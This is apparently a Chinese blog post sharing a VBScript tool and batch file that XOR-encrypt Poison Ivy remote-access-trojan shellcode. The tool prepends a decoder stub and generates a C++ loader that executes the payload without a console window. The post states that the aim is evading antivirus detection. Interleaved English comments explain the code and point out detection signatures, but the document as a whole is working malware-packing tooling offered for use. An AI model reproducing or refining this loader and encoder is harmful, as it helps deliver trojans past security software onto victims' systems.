异或Poison Ivy 服务端 Shellcode VBS 工具

Poison Ivy配置服务端可以生成不同格式的Shellcode,对Shellcode进行异或加密可以使生成的服务端逃过一些国产杀毒软件的查杀。下面的工具可以将Poison Ivy生成的二进制Shellcode(.bin文件)转换成可直接编译的.cpp文件。实验环境为XP + VC++6.0。

shellcode.vbs

' Refuse to run under the GUI host (wscript.exe): the hex output is echoed and only
' makes sense on a console, so insist on cscript.exe.
Dim hostIsGui
hostIsGui = (LCase(Right(WScript.FullName, 11)) = "wscript.exe")
If hostIsGui Then
    WScript.Echo "Execute it under the cmd.exe Plz! Thx."
    WScript.Quit
End If

' No arguments at all: show the usage banner and stop.
If WScript.Arguments.Count = 0 Then
    usage()
    WScript.Quit
End If

' Decimal-to-hexadecimal conversion.
' Dec: the value to convert (the caller passes it as a string; Mod and \ coerce it).
' Returns the upper-case hex digits with no prefix; for numeric 0 or a negative value
' the loop never runs and "" is returned, so callers pad the result themselves.
Function Dec2Hex(Dec)
    Dim digit
    Dec2Hex = ""
    Do While Dec > 0
        ' Least-significant nibble first, prepended so the digits end up in order.
        digit = Mid("0123456789ABCDEF", (Dec Mod 16) + 1, 1)
        Dec2Hex = digit & Dec2Hex
        Dec = Dec \ 16
    Loop
End Function

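' Read a whole binary file and return it as one upper-case hex string
' (two characters per byte, no separators). Despite the name it is not GIF-specific.
' sStr: path of the file to read.
' Raises the ADODB error unchanged if the file cannot be opened or loaded.
Function ReadGif(sStr)
    Dim i, iHex, oStream, bytes, hexOut
    Set oStream = CreateObject("Adodb.Stream")
    oStream.Type = 1   ' adTypeBinary
    oStream.Open
    oStream.LoadFromFile sStr
    ' Read the stream once into memory instead of once per byte (Read() consumes the
    ' stream, so re-reading it inside the loop was quadratic in the file size).
    bytes = oStream.Read()
    oStream.Close
    Set oStream = Nothing

    hexOut = ""
    ' NOTE(review): Read() on an empty stream appears to return Null — guard so an
    ' empty input yields "" instead of a type-mismatch in the For bound.
    If Not IsNull(bytes) Then
        For i = 1 To LenB(bytes)
            iHex = Hex(AscB(MidB(bytes, i, 1)))
            If Len(iHex) = 1 Then iHex = "0" & iHex   ' keep every byte two digits wide
            hexOut = hexOut & iHex
        Next
    End If
    ReadGif = hexOut
End Function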

' Chunk-and-join helper used to lay the hex dump out in fixed-width pieces.
' sSource: the string to split; iLong: characters per piece; sJoiner: text placed
' between pieces (never after the last one).
' The final piece may be shorter than iLong. An empty sSource produces no pieces
' and the function result is left unassigned, exactly as an empty concatenation would be.
Function CutAndJoin(sSource, iLong, sJoiner)
    Dim pos, acc
    For pos = 1 To Len(sSource) Step iLong
        If pos = 1 Then
            acc = Mid(sSource, pos, iLong)
        Else
            acc = acc & sJoiner & Mid(sSource, pos, iLong)
        End If
    Next
    CutAndJoin = acc
End Function

' Command-line arguments (see usage()): arg(0) = input .bin file,
' arg(1) = XOR key written as a hex byte, arg(2) = output .cpp file.
Set Arg=Wscript.Arguments

' Hex dump of the input as two-digit pairs separated by "\x", e.g. "AB\xCD\xEF".
tempshellccode=CutAndJoin(ReadGif(arg(0)),2,"\x")

' One array element per byte (as a two-character hex string).
shellcode=Split(tempshellccode,"\x")


' XOR each element with the key. The "&h" prefix makes VBScript coerce both strings
' to numbers for Xor; the two guards after Dec2Hex normalise the result to exactly
' two hex digits again.
For i=1 To UBound(shellcode)
temp=(("&h"&shellcode(i)) Xor "&h"&arg(1))
temp=Dec2Hex(CStr(temp))
If Len(temp)=1 Then temp="0"&temp
If temp="" Then temp="00"
vbshellcode=vbshellcode&"\x"&temp
Next

' Fixed decoder stub placed in front of the encoded bytes. Every byte of it is constant
' except the key, which is spliced in as plain text at a fixed offset: the stub is
' therefore a static signature for detection, and the key — and with it the original
' payload — can be read straight out of any sample produced by this script.
decode="\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x34\x21\x80\x34\x0A\x"&arg(1)&"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
decode=decode&LCase(vbshellcode)

WScript.Echo CutAndJoin(decode, 80, Chr(13)) '80 is a multiple of 4, which makes the layout look tidier


' Write a C++ source file that embeds the global `decode` string as a char array and
' calls into it from main(). Chr(34) is used throughout for the embedded double quotes.
' cpp: path of the .cpp file to create (ForWriting, created if missing, overwritten otherwise).
Function writef(cpp)
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(cpp,2,true)
.writeline "#include<windows.h>"
.writeline "#pragma comment(linker, "&Chr(34)&"/OPT:NOWIN98"&Chr(34)&")"
' GUI subsystem with the CRT entry point: the built program shows no console window.
.writeline "#pragma comment(linker, "&Chr(34)&"/subsystem:\"&Chr(34)&"windows\"&Chr(34)&" /entry:\"&Chr(34)&"mainCRTStartup\"&Chr(34)&""&Chr(34)&" )"
' Merging .rdata into .text puts the ShellCode array into the executable section so it
' can be called; this linker setting is a useful static-analysis indicator for such loaders.
.writeline "#pragma comment(linker, "&Chr(34)&"/MERGE:.rdata=.text"&Chr(34)&")"
    .writeline "char ShellCode[]="
' The array literal is broken into 80-character lines, each wrapped in quotes.
.writeline Chr(34)&CutAndJoin(decode, 80, Chr(34)&Chr(13)&Chr(34))&Chr(34)&";"
.writeline "int main()"
    .writeline "{"
    .writeline " ( (void(*)(void)) &ShellCode)();"
    .writeline "return 0;"
    .writeline "}"
   .close
End with
Set fso = Nothing
End Function

' Emit the .cpp file at the path given as the third argument.
Call writef(arg(2))


' Return True when a file exists at path str, False otherwise.
Function Findfile(str)
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    Findfile = fso.FileExists(str)
    Set fso = Nothing
End Function


' Report success only if the output file really was created.
If Findfile(arg(2)) Then wsh.echo "已生成"&arg(2)&"的c语言格式文件"


' Print the usage banner (called when the script is started without arguments).
Function usage()
    Dim banner, ln
    banner = Array( _
        "+---------- ^^ shellcode xor for Poison Ivy 2.3.2 vbscript----------+", _
        "|不只是针对Poison的bin文件进行变形,稍做改动可以xor其它的shellcode---+", _
        "|Useage:                                                            |", _
        "|       cscript.exe shellcode.vbs x.bin xorhexnum test.cpp          |", _
        "|ex:                                                                |", _
        "|       cscript.exe shellcode.vbs c:\PoisonIvy.bin 21 c:\test.cpp   |", _
        "+-------------------------------------------------------------------+" & Chr(10))
    For Each ln In banner
        WScript.Echo ln
    Next
End Function

shellcode.bat

rem Arguments: <input .bin> <XOR key as a hex byte> <output .cpp>; here the key is 85 (hex).
cscript.exe shellcode.vbs c:\PoisonIvy.bin 85 c:\PoisonIvy.cpp

shellcode.bat和shellcode.vbs放在同一目录中,编辑shellcode.bat可以设置.bin文件和.cpp文件的目录,中间的数字为异或值。
